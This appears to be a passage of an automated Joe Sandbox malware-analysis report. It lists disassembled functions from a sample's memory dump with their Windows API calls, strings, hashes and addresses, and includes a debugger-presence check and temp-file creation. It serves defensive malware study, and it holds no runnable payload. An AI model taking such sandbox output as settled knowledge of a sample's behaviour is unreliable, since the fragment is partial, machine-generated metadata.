                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: 3, 3, 16, 1
                                                                                      • API String ID: 176396367-3042988571
                                                                                      • Opcode ID: d34cb8de1639c6710f7b9942549407b95c662ffcccb64fe9b05552182405c359
                                                                                      • Instruction ID: 5069212646a858b83c88bd898182126d100ba6eecf2ef0eaaa4e59c55d723dde
                                                                                      • Opcode Fuzzy Hash: d34cb8de1639c6710f7b9942549407b95c662ffcccb64fe9b05552182405c359
                                                                                      • Instruction Fuzzy Hash: CCE061023363201097351279DCC5B7F578DCFCD760B14192BF985C2267EA94DE91A7A0
                                                                                      Function 00C70B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C70B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 000a9406c1ed7005cc5e0a7989cf2909fdbd96ff097383e724ca8c9d351e9ce8
                                                                                      • Instruction ID: e27469d67d84821241c09ae12a4a3bf8c846f8d99cb1dae38af7ad51819560fe
                                                                                      • Opcode Fuzzy Hash: 000a9406c1ed7005cc5e0a7989cf2909fdbd96ff097383e724ca8c9d351e9ce8
                                                                                      • Instruction Fuzzy Hash: FDE0D83124431826D21437547C43F897A848F06B25F10043BF758955C38EE1659166E9
                                                                                      Function 00C30D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C30D71,?,?,?,00C1100A), ref: 00C2F7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C30D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C30D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C30D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: 821d13663de54b74360534878147e7f6bc901071e3f1a52c99bcf2ac346fc91a
                                                                                      • Instruction ID: 68e876f3cc7322140a3c679b13fe0d2b0fb1034ca9823740f3af8eabd3152f8c
                                                                                      • Opcode Fuzzy Hash: 821d13663de54b74360534878147e7f6bc901071e3f1a52c99bcf2ac346fc91a
                                                                                      • Instruction Fuzzy Hash: D7E06DB02007518BD7209FB8E45834A7BE0AB05748F104A2DE482C7651DBB4E4859B91
                                                                                      Function 00C83017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C8302F
                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C83044
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
                                                                                      • Opcode ID: 725bff7603fc62b5b160e24f8090e91e83cd6322f01574843907eab221fa8de6
                                                                                      • Instruction ID: d97b3adf468154d3b809746aa539223165fa043a1f2a508fe3c75a7823b5297e
                                                                                      • Opcode Fuzzy Hash: 725bff7603fc62b5b160e24f8090e91e83cd6322f01574843907eab221fa8de6
                                                                                      • Instruction Fuzzy Hash: 28D05EB250032867DA20A7A4AD4EFCB7B6CDB05754F0002A2B696E3191DBB49984CAD0
                                                                                      Function 00C6D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      • Opcode ID: 188f9ec5fa5f3dcf9ad37beb073ee2e7d134fc0610dfe2fe7364214cfb66a9a7
                                                                                      • Instruction ID: 5bc4e8b313ffcf39edc8827152a7bf6a901c72579920c961e4974df1ff2d42bb
                                                                                      • Opcode Fuzzy Hash: 188f9ec5fa5f3dcf9ad37beb073ee2e7d134fc0610dfe2fe7364214cfb66a9a7
                                                                                      • Instruction Fuzzy Hash: 88D012A1D08118EACBA096D2DCD59B9B37CAB18301F508462F90792040E734C9086761
                                                                                      Function 00CA2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA236C
                                                                                      • PostMessageW.USER32(00000000), ref: 00CA2373
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: 2950ca9a6a52f57b264064dcfdf42b8de20fecff6972bae2d1d1c75eb7172dfd
                                                                                      • Instruction ID: 7bd559cecf928f9f2713a1c422290344982fafef841786108d142048714658eb
                                                                                      • Opcode Fuzzy Hash: 2950ca9a6a52f57b264064dcfdf42b8de20fecff6972bae2d1d1c75eb7172dfd
                                                                                      • Instruction Fuzzy Hash: FFD0C9327853107AE664A771AC4FFCA76149B16B14F0149167755AB1D0C9A0A841CA54
                                                                                      Function 00CA2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA233F
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: a7325656309037ae97e03dd69f7650d747481e20f9eae4d556ff51ef8afb3c18
                                                                                      • Instruction ID: f636260ab1c92fd49d4b55f99f0fb9799494ff4b89203d61efdaab9f8c5b6c1d
                                                                                      • Opcode Fuzzy Hash: a7325656309037ae97e03dd69f7650d747481e20f9eae4d556ff51ef8afb3c18
                                                                                      • Instruction Fuzzy Hash: 64D01237794310B7E664B771EC4FFCA7A149B15B14F0149167759AB1D0C9F0A841CA54
                                                                                      Function 00C4BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C4BE93
                                                                                      • GetLastError.KERNEL32 ref: 00C4BEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4BEFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0
                                                                                      • Opcode ID: 5dbc43dfcd3cd6ff670fad9de0ebe89c1781e6a1d727fab9f713736abc3852e4
                                                                                      • Instruction ID: ce0a9e41b9cedf1470d40aa765156cdcfccc6d4f1a2334665f12e7447b7cc076
                                                                                      • Opcode Fuzzy Hash: 5dbc43dfcd3cd6ff670fad9de0ebe89c1781e6a1d727fab9f713736abc3852e4
                                                                                      • Instruction Fuzzy Hash: A241B338604206AFEF25CFA5CD84BAA7BA5BF42320F144169F96D971A1DB31CE05DB60